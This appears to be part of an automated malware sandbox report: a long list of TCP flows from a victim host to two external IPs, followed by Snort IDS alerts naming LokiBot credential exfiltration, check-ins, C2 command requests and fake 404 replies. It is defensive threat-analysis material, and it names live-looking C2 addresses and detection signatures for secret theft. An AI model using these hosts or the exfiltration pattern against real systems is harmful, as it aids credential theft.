Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80

Networking

barindex
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49189
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49191
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49192
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49193
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49194
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 171.22.30.147:80
